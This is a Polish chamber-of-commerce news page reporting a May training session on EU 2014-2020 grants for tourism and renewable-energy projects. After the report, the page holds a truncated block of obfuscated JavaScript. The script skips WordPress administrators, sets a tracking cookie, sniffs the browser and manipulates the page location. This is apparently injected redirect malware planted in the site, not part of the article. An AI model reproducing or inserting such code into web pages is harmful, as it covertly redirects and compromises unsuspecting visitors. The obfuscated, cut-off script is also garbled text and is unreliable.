Bezzwrotne dotacje UE 2014-2020 – relacja ze szkolenia | Północna Izba Gospodarcza w Koszalinie

 

W dniu 29 maja w siedzibie Północnej Izby Gospodarczej w Koszalinie, odbyło się spotkanie informacyjne nt. Bezzwrotnych dotacji UE 2014-2020 dla innowacyjnych inwestycji przedsiębiorstw w sektor turystyczny i odnawialnych źródeł energii.

Na początku spotkania Pan Piotr Ostrowski – prezes Euro Projekty Consulting- przedstawił Regionalny Program Operacyjny Województwa Zachodniopomorskiego 2014-2020 dotyczące usług branży turystycznej, w tym: rodzaje projektów kwalifikowanych do dofinansowania, wysokość dofinansowania i terminy składania wniosków i przede wszystkim rodzaje kosztów kwalifikowanych w programie.

W drugiej części szkolenia omówione zostały możliwości dofinansowania działań na rzecz OZE na które składają się: budowa, rozbudowa, modernizacja jednostek wytwarzających energię elektryczną lub cieplną z odnawialnych źródeł energii przede wszystkim w oparciu o biomasę, biogaz i energię słoneczną, w tym z niezbędną infrastrukturą przyłączeniową do sieci dystrybucyjnych.

Prezentacja do pobrania: Prezentacja 1.5 TURYSTYCZNE i 2.10 OZE – 05.2019 r

Bardzo dziękujemy za tak liczne przybycie i do zobaczenia na kolejnych szkoleniach organizowanych przez PIG Koszalin!

Osoby zainteresowane uczestnictwem w kolejnej edycji szkolenia z bezzwrotnych dofinansowań zachęcamy do kontaktu z naszym biurem.

 

 

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m